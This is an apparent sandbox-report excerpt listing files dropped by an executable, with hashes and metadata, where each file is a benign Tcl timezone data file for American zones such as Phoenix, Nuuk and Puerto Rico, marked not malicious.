                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Beulah) {.. {-9223372036854775808 -24427 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.867423227197841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZEktwmGaLV9tZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:ZBwD6fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:33C03AD65753D7ADB45FC4899B504D1A
                                                                                                                                                                                                                              SHA1:ED719BB67A64DB49901BA38A945A6BA998646B8D
                                                                                                                                                                                                                              SHA-256:ABC2B6C97D9E9FBA37AC582ADBA2CE996890D090060E083405D75CDAED9EABE0
                                                                                                                                                                                                                              SHA-512:69592E8A370C8A5173827500CDDF8190AB44EA87CD7E0C416055CB7958B13A737801EA6B0FFE6032CB3F14F05001BF9DA83E4AEB20F385019B2985ECE7ACB40E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Center) {.. {-9223372036854775808 -24312 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8560
                                                                                                                                                                                                                              Entropy (8bit):3.879452555978431
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GEktwmGaLV9nlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:GBwD2fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:3D3DC12209293086FD843738A4FE87FB
                                                                                                                                                                                                                              SHA1:8103DFA18B5F3F36AF0B53FA350E0F2D300E6289
                                                                                                                                                                                                                              SHA-256:8803FF7C81C933B57178B9D3C502FB4268D9AA594A3C638A7F17AF60B12D300D
                                                                                                                                                                                                                              SHA-512:39BB939780A71B817F82D2B7F56815D33926D150525161051A9950E5A98BA9184670AFC884A1C69D56EADBD6198E3082975448EFBA5FE8A336DB071E6BAB8EF2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/New_Salem) {.. {-9223372036854775808 -24339 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -2160
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7429
                                                                                                                                                                                                                              Entropy (8bit):3.5470060859729253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0ixKXpbzvZ+FxAqe12voJ0euJFNgIHc/QEeF5Z1V8tCSfifK3facfzQWWLQelXuC:0LRJq9LstgV
                                                                                                                                                                                                                              MD5:FC9CEA4B9654D0957F55CB0E1B25A3E7
                                                                                                                                                                                                                              SHA1:8BFC3E8CEC34C4087579D3DA727143E3EC045B77
                                                                                                                                                                                                                              SHA-256:12917DAAA60134BFE56E6979BB27B58A3F295C32BAE02B233E849BCED6B8BCA2
                                                                                                                                                                                                                              SHA-512:355628F2EFF86605653A1EE7D976CE8B3229A4169D35576F6007FABAB37DD280D8F296EE88BECE3D84D3A1C476F23275D1D77CAF157E9A98672CBF14801D7292
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nuuk) {.. {-9223372036854775808 -12416 0 LMT}.. {-1686083584 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -7200 1 -0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2069
                                                                                                                                                                                                                              Entropy (8bit):3.994692300159945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Pe89WU0S+VS+TjV/NF01YluO53ON4Lvf3Pn:5gU033FS1YluOQiLvf3Pn
                                                                                                                                                                                                                              MD5:0CB80C895BB4BFD36043F1CAAFB604B7
                                                                                                                                                                                                                              SHA1:2EC2CA1D31EF1804E4EC26F449CA0D3C4F7AA7A0
                                                                                                                                                                                                                              SHA-256:FC857E4DD0A4AE60A7C56637C752205E20442C7AE62158435BEFCA838174108D
                                                                                                                                                                                                                              SHA-512:4BE44FF49AC588F1B441AB1B2678F5A0F0B60DB5C69F3F45C7447FC5A0175146F9FF83E132A5256CF7E559809EF7394C23DF9156A295D84D3A67EE917E661EED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Ojinaga) {.. {-9223372036854775808 -25060 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -21
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.970379147398626
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGEu5YfMXGm2OHGf8xYoHv5BidhZvFsc1HRX1va0v:SlSWB9eg/290ZDm2OHDxYoHv5GhZd93p
                                                                                                                                                                                                                              MD5:AA408A43079EC8933DE271BE3DA2B502
                                                                                                                                                                                                                              SHA1:421A867DB3FD4779C5F759D0B657D8EB5FB2218B
                                                                                                                                                                                                                              SHA-256:990213DDE00ADCEB74C8D1ECAF81B9C77963E4AB1F35767F7349236FC8E917DF
                                                                                                                                                                                                                              SHA-512:1FB740527555A8E128E05709D05720A249BCBA4B6434D00226C07426E6283AA48973F75268F36E6044F0F0650E012781C8E5519B7EA916C625BBF018B29E9961
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Panama) {.. {-9223372036854775808 -19088 0 LMT}.. {-2524502512 -19176 0 CMT}.. {-1946918424 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.8533019559841972
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:tTqPm4bPJWXtRbALtuO/N0HY2iUmUFLqU:Izod
                                                                                                                                                                                                                              MD5:6BA298F9CEB6406802A01C13313F8EF1
                                                                                                                                                                                                                              SHA1:D77C113CFA927EF65461781FD080F590C8CFCBB9
                                                                                                                                                                                                                              SHA-256:1FB962ECC1E5F02E1001C70460FFF720B114554F9AA7956D6DA154DBEA87B4D7
                                                                                                                                                                                                                              SHA-512:C7F4E2DA503A3167098CFAB7AEC8D75A32D6B081E6777DE7BA3D6B4558D0C44D2CD8A0F1626968295031BABFD2CB96B031B4C00A44F2C554B5B217AE67E69EB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Pangnirtung) {.. {-9223372036854775808 0 0 -00}.. {-1546300800 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-147902400 -7200 1 ADDT}.. {-131572800 -14400 0 AST}.. {325663200 -10800 1 ADT}.. {341384400 -14400 0 AST}.. {357112800 -10800 1 ADT}.. {372834000 -14400 0 AST}.. {388562400 -10800 1 ADT}.. {404888400 -14400 0 AST}.. {420012000 -10800 1 ADT}.. {436338000 -14400 0 AST}.. {452066400 -10800 1 ADT}.. {467787600 -14400 0 AST}.. {483516000 -10800 1 ADT}.. {499237200 -14400 0 AST}.. {514965600 -10800 1 ADT}.. {530686800 -14400 0 AST}.. {544600800 -10800 1 ADT}.. {562136400 -14400 0 AST}.. {576050400 -10800 1 ADT}.. {594190800 -14400 0 AST}.. {607500000 -10800 1 ADT}.. {625640400 -14400 0 AST}.. {638949600 -10800 1 ADT}.. {657090000 -14400 0 AST}.. {671004000 -10800 1 ADT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):253
                                                                                                                                                                                                                              Entropy (8bit):4.784405839512086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290olofDm2OHekeoHXFIV/1Vw/9vVOzFZg/VVFAKV:MB86290oloLmdHeVCXqV/k/9v4zW/OW
                                                                                                                                                                                                                              MD5:BFCE7E2618D6935031D6941AD6DDD8E3
                                                                                                                                                                                                                              SHA1:1953CD224FB2363B10372C0476760F3FB020CB00
                                                                                                                                                                                                                              SHA-256:B3EE44B3526BEDFC25B806371D3C465FDBD6CC647F30BF093750651E4A0C1BE4
                                                                                                                                                                                                                              SHA-512:31262DF034E084DA4CDB57B99178594C29129F61F3535E5D8245B8BB4AB6BF314307B0F5E58B74C349684CD761C9CDE44EB10407FB135BA6427D3D1E9DA99B40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Paramaribo) {.. {-9223372036854775808 -13240 0 LMT}.. {-1861906760 -13252 0 PMT}.. {-1104524348 -13236 0 PMT}.. {-765317964 -12600 0 -0330}.. {465449400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                              Entropy (8bit):4.444598497301421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290OXmdH514YCvb8o1W4S9xRvhhHRVxORBYUNv:5tekdvYP1x52yq
                                                                                                                                                                                                                              MD5:062ECA57C0B795780240CD7AFE70BDA0
                                                                                                                                                                                                                              SHA1:89D71A11DD8D4E000F7FADBDDC77C4C1DC1195F7
                                                                                                                                                                                                                              SHA-256:DFA0EC91804B789A1A7E1B1977710435D2589A5B54C1579C8E1F5BF96D2FD007
                                                                                                                                                                                                                              SHA-512:7D123AA872E0B8286A26E338AE0F8E0D7A6F0F2EA8B1EBEC6DBB59477C812985CB246AD397D0901A58FDB7FF14171CF60169DC15C538B95C58BD2D46106A7A4D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Phoenix) {.. {-9223372036854775808 -26898 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-820519140 -25200 0 MST}.. {-796841940 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-56221200 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6613
                                                                                                                                                                                                                              Entropy (8bit):3.8549788442269395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ux+E2p3T6ZqrNSMEBPMcywh4NF5zCC7IOTWa1HW1241UWK9BDL+3XC4BMrS2LxP:KOfS0HY2iU7KKdFL6Aa2K4gSLf8e
                                                                                                                                                                                                                              MD5:A720323DF122C70C1530788DB24700BA
                                                                                                                                                                                                                              SHA1:20674BD7D84CC686ABBB5D6B36B520A5E9C813ED
                                                                                                                                                                                                                              SHA-256:A89C580899AD2FF8DF45A783BB90D501DC32C28B92931CA18ABD13453E76244B
                                                                                                                                                                                                                              SHA-512:02B71E537B9FDAF1B68E381F0007CCBBA53EB70719ED38F51B56C5BFA64C7E3D9797053C9DE3A920E5CAFA09BBC062FCED62B5D6B9213AFA8286B95DEDAB0532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Port-au-Prince) {.. {-9223372036854775808 -17360 0 LMT}.. {-2524504240 -17340 0 PPMT}.. {-1670483460 -18000 0 EST}.. {421218000 -14400 1 EDT}.. {436334400 -18000 0 EST}.. {452062800 -14400 1 EDT}.. {467784000 -18000 0 EST}.. {483512400 -14400 1 EDT}.. {499233600 -18000 0 EST}.. {514962000 -14400 1 EDT}.. {530683200 -18000 0 EST}.. {546411600 -14400 1 EDT}.. {562132800 -18000 0 EST}.. {576050400 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607500000 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638949600 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671004000 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {702453600 -14400 1 EDT}.. {719992800 -18000 0 EST}.. {733903200 -14400 1 EDT}.. {752047200 -18000 0 EST}.. {765352800 -14400 1 EDT}.. {783496800 -18000 0 EST}.. {796802400 -14400 1 EDT}.. {814946400 -18000 0 EST}.. {828856800 -14400 1 EDT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.919510214047913
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290e7490ppv:MByMYbpwt290190b
                                                                                                                                                                                                                              MD5:4AB394CB233B101627136EB5E070CF9B
                                                                                                                                                                                                                              SHA1:F00600CD2DB10FE157C3696F665B9759EEA85F99
                                                                                                                                                                                                                              SHA-256:A4952380C89A6903FFE5BF8707B94B1BB72568FFD03DB04BF4D98E38AC82EEB7
                                                                                                                                                                                                                              SHA-512:58F4AD08FA10F1884FA641C4EA778C0FC013EABBD68DF5DE04D5B301227396260C3D669DB33DD6A6B33F1550C24BBD7777D756DF0D61CEEAF5EC6541EDFA296C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Port_of_Spain) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.866417687745155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/290msh490th4:MByMYdIp7t290v490I
                                                                                                                                                                                                                              MD5:6B570E79FA2AA7D6CB1E56A11EE0A37C
                                                                                                                                                                                                                              SHA1:396A2C9BBE4F264DD5A4F2E44D3E63C57F52186B
                                                                                                                                                                                                                              SHA-256:52921EEA2A1925DF06CEA4638ED4128FAAA8FBA40ED4E0741650B419E5152DCB
                                                                                                                                                                                                                              SHA-512:FA75A179664BED02A0F5BC1B7C3DD5F3E986544A151634BA4C4401476F5999714C89E240D9AF805484D1BEC04A1A562157FAEECA1603C4FF8CFFB424B9DEB560
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1051
                                                                                                                                                                                                                              Entropy (8bit):3.851275104153641
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Xe4QJnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/8:5kSeSFESoSQSrSsCSeSPS1cSQSQlSsSX
                                                                                                                                                                                                                              MD5:03046BA6F8344C32AD7A22748DC871AB
                                                                                                                                                                                                                              SHA1:AB9ED078D80AE99EF6DE4BF34AC45359B82D1284
                                                                                                                                                                                                                              SHA-256:E6E6F6753E7D443052A64D4DB07B8D443CE13A573946E7D0A19CDD4BBA4A2F04
                                                                                                                                                                                                                              SHA-512:620953BB4C8CF203262EC0C1F807543D24B9894C3B531AE57F7CEF630452CC9AC7CA41D43A6D8891F9CF17594E9EE34CF501F8508E7C0669A8E5EF9C70B6EAA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Porto_Velho) {.. {-9223372036854775808 -15336 0 LMT}.. {-1767210264 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {5712012
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):283
                                                                                                                                                                                                                              Entropy (8bit):4.781646667761219
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290piDm2OH9VoHvMlFoeVVF70ZVVFUFkzk/lLJpR/lAov:MB862908mdHvCvMlGe/J0Z/uFkzk/lL1
                                                                                                                                                                                                                              MD5:E2E2E0D6677FFF2E37BBFC3522F2A9AA
                                                                                                                                                                                                                              SHA1:4C1C93E14FBC00B8B1E78B8D9631599164305EB1
                                                                                                                                                                                                                              SHA-256:2981248A9F14EBFC8791EC5453170376CBD549557E495EA0E331CC18556C958E
                                                                                                                                                                                                                              SHA-512:F056B03EB9945823F5284C840E06E298DD2DE854F1555CD16D0BB19D962B73EF34A05683E6369B0D89CB7C3F7D082C312CCA6F8C6A0BB53F5C75FE4A863FCD95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Puerto_Rico) {.. {-9223372036854775808 -15865 0 LMT}.. {-2233035335 -14400 0 AST}.. {-873057600 -10800 0 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3729
                                                                                                                                                                                                                              Entropy (8bit):3.6253057710886956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:2RPW7xUQjzoMUBI0nuUoDKlHslPlgiot7JC/Xk8NWse4r4g5xCEmSdLkUsZOn+ZW:247xUQjzoMUBI0nuUoDK6lPlgiot7JCV
                                                                                                                                                                                                                              MD5:D4ECD2A380E55A10FB97AB1D29C619F3
                                                                                                                                                                                                                              SHA1:AAAFF44590F08623BE6F61EA6EFF6488C99A73BF
                                                                                                                                                                                                                              SHA-256:4E626BD8B9182E56ADA1E9276585E945957431EA9BEA949CE071305E4E3C70A2
                                                                                                                                                                                                                              SHA-512:677EE7093A53B48DE526C5877DB7128E8746831FE0DC44A38EB84050757E6017C9471EEF9AFCCEEEB5794D1608E486840804C01BD6276EA53F3C7823B05ED62B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Punta_Arenas) {.. {-9223372036854775808 -17020 0 LMT}.. {-2524504580 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-736632000 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}.. {37767600 -14400 0 -04}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.926514352074701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7pYHAIgppuRN/290ly90pl:MByMY/pcRt290w90X
                                                                                                                                                                                                                              MD5:552FBD2FBAD42F79C7993124D9CCC54B
                                                                                                                                                                                                                              SHA1:9029B7CCE8A5AD0F14C05FFBCDA4CA225DEC1708
                                                                                                                                                                                                                              SHA-256:FEC74A3FCBD9B99FDFF24B54223DA187958697CBE756A54592F6171C69F1403F
                                                                                                                                                                                                                              SHA-512:96315C32C1D0DEF804A560022DA12B3C63200A680F2A37D1B03E1C9EA413842EB6051E1C2315AE4E7C374280AD0E59832F834A8D6D66E259EF62735A77917ECE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
